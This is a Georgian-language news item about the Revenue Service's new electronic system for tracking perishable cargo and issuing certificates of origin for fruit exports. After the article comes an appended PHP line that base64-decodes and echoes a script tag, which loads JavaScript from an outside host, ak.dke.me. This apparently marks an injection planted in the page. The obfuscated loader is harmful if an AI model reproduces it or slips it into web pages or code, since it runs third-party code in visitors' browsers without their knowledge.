celsiusi
ავერსი საქკაბელი
ახალი ელექტრონული სისტემის მეშვეობით შემოსავლების სამსახურს შეუძლია 24-საათიან რეჟიმში მიიღოს ინფორმაცია მალფუჭებადი ტვირთების შესახებ და უზრუნველყოს მათი შეუფერხებელი გადაადგილება - ამის შესახებ შემოსავლების სამსახურის მიერ გავრცელებულ განცხადებაშია აღნიშნული.
 
უწყების ცნობით, შემოსავლების სამსახურის მიერ შექმნილი ახალი ელექტრონული მართვის სისტემა უკვე წარმატებით ფუნქციონირებს.
 
“დაინტერესებული კომპანიების წარმომადგენლებს შესაძლებლობა ეძლევათ, შემოსავლების სამსახურის ვებგვერდის საშუალებით - "ერთი ფანჯრის პრინციპით“ სწრაფად და მარტივად ისარგებლონ ყველა სახის საბაჟო პროცედურით, მიიღონ წარმოშობის სერტიფიკატი ყოველგვარი დამატებითი დოკუმენტაციის წარდგენის გარეშე.
 
ახალი პროგრამის მეშვეობით პატრულ ინსპექტორები შეძლებენ 24-საათიან რეჟიმში მიიღონ ინფორმაცია მალფუჭებადი ტვირთების შესახებ და უზრუნველყონ მათი შეუფერხებელი გადაადგილება.
 
აქტიური სეზონის გათვალისწინებით, ხილის ექსპორტზე, საბაჟო დეპარტამენტის მიერ გაცემულია - 1 200 მეტი წარმოშობის სერტიფიკატი”-ნათქვამია განცახდებაში.
1205
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");